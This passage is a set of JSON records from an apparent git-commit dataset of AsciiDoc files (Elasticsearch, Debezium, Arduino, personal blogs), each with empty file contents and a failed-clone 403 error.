\/elasticsearch,alexshadow007\/elasticsearch,winstonewert\/elasticsearch,MisterAndersen\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,C-Bish\/elasticsearch,nilabhsagar\/elasticsearch,rlugojr\/elasticsearch,mjason3\/elasticsearch,StefanGor\/elasticsearch,Shepard1212\/elasticsearch,mortonsykes\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,scottsom\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,MaineC\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,fforbeck\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,gmarz\/elasticsearch,jprante\/elasticsearch,liweinan0423\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,nazarewk\/elasticsearch,LeoYao\/elasticsearch,MaineC\/elasticsearch,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,a2lin\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,artnowo\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch","old_file":"docs\/reference\/setup\/reindex_upgrade.asciidoc","new_file":"docs\/reference\/setup\/reindex_upgrade.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a71b8048729be09788805a1758d28c8f5e22ec3","subject":"\ud83d\ude80 Debezium 1.0 release announcement","message":"\ud83d\ude80 Debezium 1.0 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-12-18-debezium-1-0-0-final-released.adoc","new_file":"blog\/2019-12-18-debezium-1-0-0-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"700d246757e3c89c6895203c9ef23048c7cd3f18","subject":"Update 20161110-1347.adoc","message":"Update 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1347.adoc","new_file":"_posts\/20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0301474fccd044be669a92c67b69386b612217ef","subject":"hello spring data","message":"hello spring data\n","repos":"verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works","old_file":"data.adoc","new_file":"data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc9fa3afaf28f7e362eca2a9ab28b6f0dcd0e3cb","subject":"Added release notes for 5.0.0-alpha4","message":"Added release notes for 5.0.0-alpha4\n","repos":"liweinan0423\/elasticsearch,JervyShi\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,njlawton\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,spiegela\/elasticsearch,pozhidaevak\/elasticsearch,girirajsharma\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,ricardocerq\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,dpursehouse\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,alexshadow007\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra5-rc,kalimatas\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,dongjoon-hyun\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,MaineC\/elasticsearch,nazarewk\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,fforbeck\/elasticsearch,C-Bish\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,palecur\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,gmarz\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,elasticdog\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,liweinan0423\/elasticsearch,i-am-Nathan\/elasticsearch,vroyer\/elasticassandra,henakamaMSFT\/elasticsearch,rlugojr\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,zkidkid\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,cwurm\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,sreeramjayan\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,gfyoung\/elasticsearch,avikurapati\/elasticsearch,alexshadow007\/elasticsearch,dongjoon-hyun\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,sreeramjayan\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,scorpionvicky\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,awislowski\/elasticsearch,dpursehouse\/elasticsearch,i-am-Nathan\/elasticsearch,JSCooke\/elasticsearch,nilabhsagar\/elasticsearch,dongjoon-hyun\/elasticsearch,LewayneNaidoo\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,ricardocerq\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,Stacey-Gammon\/elasticsearch,yanjunh\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,StefanGor\/elasticsearch,fforbeck\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,strapdata\/elassandra,girirajsharma\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,C-Bish\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,gmarz\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra5-rc,brandonkearby\/elasticsearch,liweinan0423\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,wenpos\/elasticsearch,avikurapati\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,yanjunh\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,palecur\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,liweinan0423\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,awislowski\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,gmarz\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,JSCooke\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra5-rc,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,palecur\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,MisterAndersen\/elasticsearch,cwurm\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,njlawton\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,gmarz\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,gfyoung\/elasticsearch,girirajsharma\/elasticsearch,zkidkid\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,elasticdog\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra5-rc,artnowo\/elasticsearch,avikurapati\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,dpursehouse\/elasticsearch,awislowski\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,nazarewk\/elasticsearch,sreeramjayan\/elasticsearch,i-am-Nathan\/elasticsearch,brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,sreeramjayan\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,elasticdog\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,awislowski\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,wuranbo\/elasticsearch,awislowski\/elasticsearch,JackyMai\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,uschindler\/elasticsearch,palecur\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,ricardocerq\/elasticsearch,girirajsharma\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,mortonsykes\/elasticsearch,dpursehouse\/elasticsearch,gingerwizard\/elasticsearch,avikurapati\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,cwurm\/elasticsearch,ricardocerq\/elasticsearch,cwurm\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,girirajsharma\/elasticsearch,dpursehouse\/elasticsearch,JervyShi\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,palecur\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,pozhidaevak\/elasticsearch,zkidkid\/elasticsearch,GlenRSmith\/elasticsearch,ricardocerq\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,dongjoon-hyun\/elasticsearch,cwurm\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,jprante\/elasticsearch,rlugojr\/elasticsearch,LewayneNaidoo\/elasticsearch,zkidkid\/elasticsearch,spiegela\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/release-notes\/5.0.0-alpha4.asciidoc","new_file":"docs\/reference\/release-notes\/5.0.0-alpha4.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c9b55b756cba79a5a22284594b5a66edf58ca64","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad65e5388875462425aab128fe50d4de2812c572","subject":"Use \"$@\" instead of bare $@ to protect arguments","message":"Use \"$@\" instead of bare $@ to protect arguments\n\nBash expands bare $@, and then do word-splitting and file-globing. It breaks command-line arguments\r\nfor arduino if command-line arguments for the wrapper script contains $IFS, '*', '?' and etc. characters.\r\n\r\nUse \"$@\" in this case.","repos":"niggor\/Arduino_cc,NicoHood\/Arduino,stickbreaker\/Arduino,tbowmo\/Arduino,me-no-dev\/Arduino-1,stickbreaker\/Arduino,majenkotech\/Arduino,PaoloP74\/Arduino,NicoHood\/Arduino,me-no-dev\/Arduino-1,majenkotech\/Arduino,PaoloP74\/Arduino,majenkotech\/Arduino,majenkotech\/Arduino,Chris--A\/Arduino,me-no-dev\/Arduino-1,Chris--A\/Arduino,me-no-dev\/Arduino-1,nandojve\/Arduino,nandojve\/Arduino,stickbreaker\/Arduino,bsmr-arduino\/Arduino,me-no-dev\/Arduino-1,stickbreaker\/Arduino,Chris--A\/Arduino,NicoHood\/Arduino,PaoloP74\/Arduino,majenkotech\/Arduino,niggor\/Arduino_cc,bsmr-arduino\/Arduino,niggor\/Arduino_cc,me-no-dev\/Arduino-1,PaoloP74\/Arduino,bsmr-arduino\/Arduino,niggor\/Arduino_cc,PaoloP74\/Arduino,majenkotech\/Arduino,Chris--A\/Arduino,NicoHood\/Arduino,stickbreaker\/Arduino,bsmr-arduino\/Arduino,PaoloP74\/Arduino,stickbreaker\/Arduino,me-no-dev\/Arduino-1,bsmr-arduino\/Arduino,tbowmo\/Arduino,stickbreaker\/Arduino,NicoHood\/Arduino,tbowmo\/Arduino,nandojve\/Arduino,bsmr-arduino\/Arduino,niggor\/Arduino_cc,NicoHood\/Arduino,Chris--A\/Arduino,nandojve\/Arduino,bsmr-arduino\/Arduino,PaoloP74\/Arduino,Chris--A\/Arduino,nandojve\/Arduino,tbowmo\/Arduino,niggor\/Arduino_cc,bsmr-arduino\/Arduino,tbowmo\/Arduino,Chris--A\/Arduino,Chris--A\/Arduino,tbowmo\/Arduino,nandojve\/Arduino,niggor\/Arduino_cc,majenkotech\/Arduino,NicoHood\/Arduino,niggor\/Arduino_cc,nandojve\/Arduino,PaoloP74\/Arduino,niggor\/Arduino_cc,tbowmo\/Arduino,me-no-dev\/Arduino-1,nandojve\/Arduino,NicoHood\/Arduino,tbowmo\/Arduino","old_file":"build\/shared\/manpage.adoc","new_file":"build\/shared\/manpage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tbowmo\/Arduino.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"d7d2929186351cd0b0ff76ef10ae82b4deeb15f3","subject":"Added smart pointer draft","message":"Added smart pointer draft","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8758c328847ea8ae7069f7c931478ed172d1ec5b","subject":"Create common-completesolution.adoc","message":"Create common-completesolution.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-completesolution.adoc","new_file":"src\/main\/docs\/common-completesolution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2290014395b07459fa87b53926922118386f5943","subject":"Update 2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","message":"Update 2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","repos":"manikmagar\/manikmagar.github.io,manikmagar\/manikmagar.github.io","old_file":"_posts\/2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","new_file":"_posts\/2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manikmagar\/manikmagar.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ae6d8ec92f77e26f73b7b2e62d27c638cbac96","subject":"Update 2015-10-22-On-your-marks-get-set-Die.adoc","message":"Update 2015-10-22-On-your-marks-get-set-Die.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-22-On-your-marks-get-set-Die.adoc","new_file":"_posts\/2015-10-22-On-your-marks-get-set-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26a9dbcb7fb3c064e7a148fbdf70565829dc5fa1","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78797c7a74008cbbfa462165741391be70e7230c","subject":"Update CHANGELOG.adoc","message":"Update CHANGELOG.adoc\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee0a0cbb48500f1ed2749d0b1fdaa3e70e3f2a3b","subject":"Update 2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","message":"Update 2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io","old_file":"_posts\/2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","new_file":"_posts\/2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4467afe55bd4411028c33e81c0fe3cebaa74ca2e","subject":"Update 2016-04-06-Buffer-Overflow-basic.adoc","message":"Update 2016-04-06-Buffer-Overflow-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Buffer-Overflow-basic.adoc","new_file":"_posts\/2016-04-06-Buffer-Overflow-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af850084d665bbd705bade1415b462180114a7d7","subject":"Update 2014-07-14-GitHub-Tools-und-Services.adoc","message":"Update 2014-07-14-GitHub-Tools-und-Services.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2014-07-14-GitHub-Tools-und-Services.adoc","new_file":"_posts\/2014-07-14-GitHub-Tools-und-Services.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d9b88ab38d3ca4f17c22282879851729b381038","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"568d39a2e5d82d60d07485fd858763c99d4cb19c","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cceb236caefe4ba7a3f6137c124b09624622181","subject":"Update 2019-01-23-C-P-P.adoc","message":"Update 2019-01-23-C-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-23-C-P-P.adoc","new_file":"_posts\/2019-01-23-C-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526b3a5ae213c16ed38dd9207ab64135dfc075c1","subject":"Update 2019-01-31-Dica-Mouse-Without-Borders.adoc","message":"Update 2019-01-31-Dica-Mouse-Without-Borders.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2019-01-31-Dica-Mouse-Without-Borders.adoc","new_file":"_posts\/2019-01-31-Dica-Mouse-Without-Borders.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75b6e902bd119f7c4d02fb3cbba4f731b52f71e","subject":"Add Guide for OpenTelemetry","message":"Add Guide for OpenTelemetry\n\nResolves #16093\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/opentelemetry.adoc","new_file":"docs\/src\/main\/asciidoc\/opentelemetry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 